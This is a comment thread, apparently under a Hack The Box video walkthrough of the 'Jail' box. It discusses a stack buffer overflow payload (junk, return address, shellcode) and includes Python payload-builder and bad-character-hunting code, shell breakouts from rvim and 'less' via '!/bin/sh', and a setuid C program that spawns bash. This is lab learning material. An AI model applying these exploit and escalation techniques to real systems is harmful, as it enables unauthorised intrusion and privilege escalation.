I just guessed "Morris1962!" because 1962 was the year he escaped!
IppSec, I have been waiting for a new video from you... I hope you had a nice Xmas and a happy new year.
Brilliant, glad I found your channel.
congrats on 100k dude :D
Top notch, as usual
I have some questions... sometimes the nmap scan didn't show the ports that I needed to enumerate, so only after I watched the walkthrough did I realise that those ports were indeed open. Should I run nmap multiple times? Even in a real-life scenario?
Thank you ippsec , keep going bro
Great course
nice work thank you
I'm wondering how you could escape from rvim (sudo), as this is restricted vim, and it should prevent shell execution.
That's a good point! I looked into it - it seems running Python within rvim isn't counted as an actual shell command, presumably it launches Python directly. This was resolved in February- github.com/vim/vim/issues/3904
For anyone who gets this error when running the script:
TypeError: can only concatenate str (not "bytes") to str
Python 3 complains about concatenating strings with bytes, and even bytes with bytes.
I changed the line
From
--------------------------------
p.sendline("Pass " + junk + mem + buf)
To
---------------------------------------
p.sendline("PASS ")
p.sendline(junk)
p.sendline(mem)
p.sendline(buf)
p.interactive()
Then I was able to execute it and get a shell.
I can't get why we add 32 to the vuln address, can someone explain it to me? Like, the memory address after overwriting points back to the junk, so we have to add 28, but why the 4? I'm completely lost here.
It’s been a while since I did this box but a memory register is 32 bits. I’m guessing I may have used pwntools or something to handle memory addresses for me in this video? If so it’s possible I didn’t assign enough characters to fully fill the space, when that happens it automatically prepends 0’s.
Let me try to explain for you and future viewers: 28 bytes to fill up the buffer so the next four bytes can overwrite the return address. Since we have the shellcode right after the return address, it would make sense to jump to that area; the address for the shellcode in this case would be return_address+0x4
| Stack        | Address        | Notes                         |
| ------------ | -------------- | ----------------------------- |
| buffer(junk) | 0xffffd610     | 28 bytes long (ebp included)  |
| ret address  | 0xffffd610+28  | 4 bytes long                  |
| shellcode    | 0xffffd610+32  | shellcode starts here         |
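To make the table above concrete for Python 3 users, here is an added example (not the script from the video and not code any commenter posted). It assembles the "PASS " line entirely as bytes, which is also what avoids the str/bytes TypeError discussed earlier in the thread, and checks that the packed return address lands on the first shellcode byte. The buffer address 0xffffd610, the 28-byte junk / 4-byte return slot layout and the int3 marker used as stand-in shellcode are assumptions taken from the comment, not values measured on the target.

```python
import struct

# Layout assumed from the comment above (not measured on the target):
# 28 bytes of junk (buffer plus saved ebp), then the 4-byte saved return
# address, then the shellcode. 28 + 4 = 32 is the "+32" being asked about.
JUNK_LEN = 28
RET_LEN = 4
PREFIX = b"PASS "

# Constructed marker standing in for real shellcode (int3 bytes).
SAMPLE_SHELLCODE = b"\xcc" * 16


def shellcode_offset():
    """Distance from the first junk byte to the first shellcode byte."""
    return JUNK_LEN + RET_LEN


def shellcode_address(buffer_addr):
    """Where the overwritten return address must point: just past itself."""
    return buffer_addr + shellcode_offset()


def build_payload(buffer_addr, shellcode):
    """Assemble the line to send, keeping every piece as bytes.

    Concatenating a str ("PASS ") with bytes is what raises
    TypeError: can only concatenate str (not "bytes") to str in Python 3,
    so the prefix is a bytes literal. struct.pack("<I", ...) is the
    little-endian 32-bit pack that pwntools' p32() performs.
    """
    junk = b"A" * JUNK_LEN
    ret = struct.pack("<I", shellcode_address(buffer_addr))
    return PREFIX + junk + ret + shellcode


def parse_payload(payload):
    """Split a payload back into (junk, return address, shellcode)."""
    body = payload[len(PREFIX):]
    junk = body[:JUNK_LEN]
    ret = struct.unpack("<I", body[JUNK_LEN:JUNK_LEN + RET_LEN])[0]
    return junk, ret, body[JUNK_LEN + RET_LEN:]


def ret_points_to_shellcode(buffer_addr, payload):
    """True if the packed return address equals buffer_addr + 32, i.e. the
    first shellcode byte once the junk and the return slot are accounted for."""
    _, ret, _ = parse_payload(payload)
    return ret == buffer_addr + shellcode_offset()


if __name__ == "__main__":
    payload = build_payload(0xFFFFD610, SAMPLE_SHELLCODE)
    print(payload.hex())
    print(hex(shellcode_address(0xFFFFD610)))  # 0xffffd630
    # With pwntools you would then send it as one line: p.sendline(payload)
```

A real run would take the buffer address from the debugger (keeping in mind the environment-variable shift that GDB introduces, mentioned further down in the thread) and real shellcode; everything else stays bytes end to end.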
Hey, so SUID worked for me without any SELinux bypasses, I just copied my /bin/sh to the box and set the bit and boom. Interesting stuff.
You may be correct there - probably just jumped the gun on that search due to the box's name, and messing up my initial setuid file. I didn't know the interaction between SetUID and system()/exec() stuff, so it probably was just me getting lucky that the SELinux exploit used exec(). Either way, it was fun talking about SELinux :)
50:44 - does anyone know what he said about similar techniques? You can use it with the "less" command too? Can anyone elaborate?
The breakout performed in vi is similar to a case in which an attacker can break out of a shell using the command "less".
Example:
less /etc/profile
Once viewing /etc/profile in "less", the following is entered:
!/bin/sh
This will break the attacker out of "less" and into a /bin/sh shell as a result.
Source - gtfobins.github.io/gtfobins/less/
@@dayisnow you rock, thank you!
s!ck learned a lot watching this.
Why do we need to add 32 to the memory address?
Because it is four more bytes to ESP. 1 byte = 8 bits, so 4 bytes is 8*4 = 32 bits more.
@ippsec Hi IppSec. Your gdb looks pretty fancy. I can't find a proper gdbinit file, could you please share yours with us, or send a source where we could find it? It is easier to see the registers and stack on yours. The default gdbinit is not so handy. :(
Look up gdb peda.
I like this video, it has a BOF on Linux :D, but I noticed the way you generate shellcode is so fast.
Usually I use msfvenom, try to find bad chars, and use the alpha_mixed encoder, and end up with 700 bytes of shellcode :D
Never seen a box like this 😮😮😮
💖💖💖💖💖
Just a couple more notes - the reverse shell payload would not work in prod because it has a 10.10.x.x IP address, which translates to \x0A\x0A, and 0A is a bad character for this binary. Also - the SELinux escape is absolutely unnecessary, everything works without it - at least this worked for me:
#define _GNU_SOURCE   /* setresuid() is a GNU extension; this exposes its prototype in <unistd.h> */
#include <stdlib.h>
#include <unistd.h>

int main(void){
    setresuid(1000, 1000, 1000);   /* set real, effective and saved uid to 1000 before spawning the shell */
    system("/bin/bash");
    return 0;
}
Good catches, didn't even bother looking at bad characters -- should have created a script to find bad characters, would have been great content. Most of my asm experience comes from Windows boxes with mona, what did you use to hunt bad characters? Script it out in radare? Built into peda? Or just do it manually?
Additionally, yep, the SELinux escape was unnecessary, just something I had done when seeing the output of the id command and the name of the box. I try to keep my videos along the same path that I did the box in. Could have edited and changed that part of the video when I learned about the second way to get to adm. However, I still thought that was good content and felt it would have been disingenuous to make that big of an edit.
Thanks for the comment though, in the end that's a main reason I do these videos, to find out all the silly things I did when solving these boxes.
It's in the code - if it sees "\n" or \x00 in the password it stops there :) and \n = \x0A
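An added example of the bad-character hunt asked about a few replies up (this is not code from the video or from any commenter): it sends the 0x00..0xff probe, compares it with what the target kept, and excludes one bad byte per round, which matters because a terminator such as \x0A hides every byte that follows it in that round. The target's input loop is simulated here by a constructed function that stops at NUL and newline, as the reply above describes; against the real binary you would replace simulate_target_copy with the bytes you read back from the stack in gdb/peda. It also shows why a 10.10.x.x reverse-shell address trips over the \x0A bad byte while another address does not.

```python
import socket

# Bad bytes the thread identifies for this binary: the password reader
# stops at NUL and at newline (\x0A).
KNOWN_BAD = frozenset({0x00, 0x0A})


def badchar_probe(exclude=frozenset()):
    """Every byte value 0x00..0xff except those already known to be bad."""
    return bytes(b for b in range(256) if b not in exclude)


def simulate_target_copy(data):
    """Constructed stand-in for the target's input loop (assumption: it
    stops at NUL or newline). Replace with the bytes you read back from
    the stack in gdb/peda when hunting against the real binary."""
    out = bytearray()
    for b in data:
        if b in (0x00, 0x0A):
            break
        out.append(b)
    return bytes(out)


def first_divergence(sent, observed):
    """Return the first sent byte that was truncated or mangled, else None."""
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return b
    return None


def hunt_bad_chars(copy_fn, known=frozenset()):
    """Iteratively find bad bytes: each round drops the bytes found so far,
    because a terminator hides every byte that follows it in that round."""
    bad = set(known)
    while True:
        probe = badchar_probe(exclude=bad)
        culprit = first_divergence(probe, copy_fn(probe))
        if culprit is None:
            return sorted(bad)
        bad.add(culprit)


def ip_to_bytes(ip):
    """Network-order bytes an IPv4 address occupies inside reverse-shell shellcode."""
    return socket.inet_aton(ip)


def bad_offsets(data, bad=KNOWN_BAD):
    """Offsets in data (shellcode, packed address, or whole payload) holding a bad byte."""
    return [i for i, b in enumerate(data) if b in bad]


if __name__ == "__main__":
    print([hex(b) for b in hunt_bad_chars(simulate_target_copy)])
    for ip in ("10.10.14.2", "192.168.1.5"):
        raw = ip_to_bytes(ip)
        print(ip, raw.hex(), "bad at offsets", bad_offsets(raw))
```

Run bad_offsets over the final payload (return address included) before sending it: a stack address that happens to end in 0x0A is caught by the same check as the 10.10.x.x case.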
Very hard jail, but interesting
@ippsec Can you suggest any good material for exploit dev, or the best free source?
Unfortunately, I don't know. Mainly learn by doing, find vulnerable stuff with exploits. Debug and step through the exploit and try to figure out what's going on. Most people generally like getting paid if they are going to create a course, it's seriously hard work.
If you go the "free" route, you're going to spend a lot more time trying to pick it up. At some point, you need to ask yourself what that time is worth to you. Do you find a way to purchase books or courses to get you up to speed where you can do work in the field within a year? Or do you take 2-3 years to learn it and delay getting a higher income?
In the end, both routes require money. If you have the self-discipline to finish what you start, I'd wager it's actually cheaper to pay for the content up front, knowing investing in yourself will pay off in the end.
What is group
You said GDB has taken over the memory address when you restarted the process. Could you please explain what happened?
Also, how did you figure that out from the address?
@@shankaranarayana6568 It really helps if you timestamp where your question is at; this video is over 2 years old. That being said, if you start a process with GDB, it disables ASLR. You can tell because the memory address doesn't change between runs. Also, I believe the first few bits of an ASLR address look much different than non-ASLR.
@@ippsec My bad, It's at 13:44. In the first run, the stack is at 0xff922ca8 and after you restart the process it's at 0xffffce70. But since we were working with ASLR on, we expected this to change. So was it the 0xffff range which gave it away? (is this common for ASLRed stack addresses? so far I've only seen ASLR on library addresses and the first few bits are 0xf77)
GDB adds a few more environment variables to the executable this causes stack to shift.
I like to use Immunity Debugger with mona.
Could you do Nightmare when it comes out? I dare you to finish it live; you will make it to the best pentester.
I’ve already done Nightmare. And sorry no live streams of HTB boxes take too long to retire
IppSec how if it will soon come?!
I'm a mod - We verify machines are working and solvable before releasing them.
👏👏👏👏